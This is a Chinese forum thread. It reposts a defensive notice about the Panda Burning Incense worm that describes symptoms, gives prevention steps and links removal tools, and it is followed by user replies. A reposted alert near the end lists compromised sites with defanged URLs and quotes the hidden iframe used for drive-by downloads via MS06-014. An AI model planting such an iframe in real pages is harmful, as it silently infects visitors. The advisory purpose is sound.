关于近期熊猫烧香病毒的处理方法和病毒详解
[size=12px]这是前天我在办公室,向我的单位机关其他部门发的一个通知。今天看到《京华时报》《新京报》都用专版刊登了“熊猫烧香”的新闻报道,这个病毒不仅危害企业,还对家庭用户造成很大影响,于是修改了这个通知,发到cnn和bluesubway论坛,希望大家重视,不要让自己的电脑感染上病毒。--------------------------------
关于近期互联网爆发“熊猫烧香”病毒的处理方法和病毒详解
近期,一通过互联网传播的,伪装成“熊猫烧香”图案的病毒开始疯狂作案,已有数千家企业局域网遭受重创。电脑中所有可执行文件都变成了一种怪异的图案,该图案显示为“熊猫烧香”,中毒症状表现为系统蓝屏、频繁重启、硬盘数据被破坏等等,严重的整个企业局域网内所有电脑全部中毒瘫痪。我们业务部技术组搜集整理了“熊猫烧香”病毒的资料和特征,对该病毒的发作情况、感染范围和破坏能力进行了分析,如下:
一、什么是“熊猫烧香”病毒?
“熊猫烧香”又称“武汉男生”,是一种蠕虫病毒的变种,而且是经过多次变种而来的。由于中毒电脑的可执行文件会出现“熊猫烧香”图案,所以被称为“熊猫烧香”病毒。用户电脑中毒后可能会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。同时,该病毒的某些变种可以通过局域网进行传播,进而感染局域网内所有计算机系统,最终导致企业局域网瘫痪,无法正常使用。
二、“熊猫烧香”病毒发作特征
[img]http://publish.it168.com/2006/1226/images/249314.gif[/img]
1、感染所有EXE等可执行文件,并更改图标为烧香熊猫(上图)。
2、循环遍历磁盘目录,感染文件,对关键系统文件跳过。
3、这个病毒会强制关闭瑞星、江民、诺顿等杀毒软件和安全工具。
4、感染所有.htm/.html/.asp/.php/.jsp/.aspx文件,添加木马代码。
5、自动删除备份软件Ghost生成的*.gho文件
三、“熊猫烧香”病毒对企业局域网的危害
瑞星全球反病毒监测网和江民公司向企业局域网发布警告,目前“熊猫烧香”的病毒正将攻击重点转向企业局域网和网站,广大企业和网站应提高警惕紧密防范。该病毒会在中毒电脑中所有的网页文件尾部添加病毒代码,如果这些文件被上传到网站,则用户浏览后会中毒。 据悉,目前多家著名网站已经遭到此类攻击,而相继被植入病毒。全国已经感染了超过40万台电脑,几乎每天都有新变种出现。值得关注的是,感染该病毒的多数是企业局域网用户。
[color=red][b]四、家庭用户应如何防范“熊猫烧香”病毒的攻击?[/b][/color]
对于家庭电脑的用户的安全防范,我们建议:
1、安装正版“瑞星杀毒软件2007”或“卡巴斯基互联网安全套装6.0”等反病毒软件和防火墙,将病毒库更新至最高版本,并打开网页实时监控和系统实时监控。
2、拥有多台电脑的家庭应设置开机密码,尽量避免共享目录,安装“天网防火墙”等防火墙软件以防止病毒通过局域网传播。
3、已知该病毒会利用聊天软件腾讯QQ的漏洞传播,所以请家庭用户近期避免或减少使用腾讯QQ软件聊天,如果使用QQ,请下载官方的最新版本。
4、正版Windows家庭用户应去微软的官方网站打好MS06-014漏洞补丁。
5、关闭系统自动播放功能:开始——运行——gpedit.msc,组策略——计算机配置 和 用户配置下面的——管理模版——系统——关闭自动播放——设置成已启动——所有驱动器
6、家庭用户请勿浏览不安全的网站或非法网站,并且不要随意下载或接收不明软件和可执行文件。
[color=red][b]五、熊猫烧香解决方案下载地址:[/b][/color]
江民公司专杀工具:[url=http://www.jiangmin.com/download/zhuansha04.htm][color=#800080]http://www.jiangmin.com/download/zhuansha04.htm[/color][/url]
金山公司专杀工具:[url=http://tool.duba.net/zhuansha/253.shtml][color=#800080]http://tool.duba.net/zhuansha/253.shtml[/color][/url]
瑞星公司专杀工具:[url=http://it.rising.com.cn/Channels/Service/2006-11/1163505486d38734.shtml][color=#800080]http://it.rising.com.cn/Channels/Service/2006-11/1163505486d38734.shtml[/color][/url]
MS-06014漏洞补丁:[url=http://www.microsoft.com/china/technet/security/bulletin/ms06-014.mspx][color=#800080]http://www.microsoft.com/china/technet/security/bulletin/ms06-014.mspx[/color][/url][/size] 非常感谢山猫的详解,希望大家都来看看,寻求帮助~
PS: 我领导就中了,笔记本都完了~ 熊猫烧香?还是头一次听说。。。呵呵。
我一般还是很小心的,看看好预防
谢过了先。 谢谢好心人,不知道真人是不是和头像一样。吓。。。。。。。。。。。。 嗯,我单位也发了告示啦,我还说这熊猫长的很可爱,被网络部的一男狂骂~~~:loveliness: 家庭用户不要浏览不良网站就好。 这个是垃圾病毒。
随便下个杀毒的就好了。 我们公司也发了通知了~Y: 这病毒真是污辱了我们的国宝 真是不幸.傻家电脑前几天不晓得怎么的也中了熊猫烧香..
然后现在没事...
已解决他 TMD,我上周也中招了,重装系统,用下的金山专杀解决了问题.:loveliness: 偶有下GG提供的瑞星专杀。。。
应该不会有什么问题了。。 非常感谢楼主
我已经将这贴转到我的BLOG上了
不介意吧 :R: :R: 哎 今天早上一大早起来查杀一下恶意软件 发现了 熊猫 这真是让鄙人又喜又忧啊 用RUIXING专杀 嘿 竟然说没中 又用了其他的 装上 又被关掉 最后用江民的 才给杀了
听说又出现"金猪报喜"了
*************************以下为转载
1月19号,反病毒监测网发现,目前多个网站,遭到恶意攻击,用户如果访问这些网站,会被病毒感染。
截止16时整,部分统计如下:
hXXtp://www.fzzv.com/ (福州热线)
hXXp://hrway.cn/ (招聘求职网)
hXXp://www.myfdc.com.cn/building(绵阳房地产网站)
hXXp://kesum.cn/(开商网--中国商业零售门户网站)
hXXp://www.zewq.com (美图之家)
hXXp://www.wodown.com.cn/ (我的下载站)
hXXp://www.iq158.com
hXXp://www.ck816.com/
hXXp://www.nanti.cn/ (在线小游戏)
hXXp://www.510188.cn/ (QQ园)
hXXp://coosoon.com/index.htm (coosoon搜索)
hXXp://www.lalago.net (啦啦购)
hXXp://soft100.com.cn/ (百分百软件搜索站)
hXXp://www.downgame.com.cn (手机加油站)
hXXp://168.zg168.net (中国广告网(中国168)——中国最全的电子大黄页)
hXXp://www.17kx.net/ (在线小游戏)
hXXp://www.sfwzk.com/ (外挂网址库)
hXXp://www.tao168188.com/index.htm
hXXp://www.baofeng.com/(暴风影音官方网站)
攻击者利用MS06-014漏洞来传播木马,在这些网页中,都被植入了类似<iframe src=HXXP://WWW.MICR0SOFT.CN width=0 height=0></iframe>的跳转页句,一旦用户访问,则主机会在用户不知情的情况下自动链接到互联网,下载恶意程序。
页:
[1]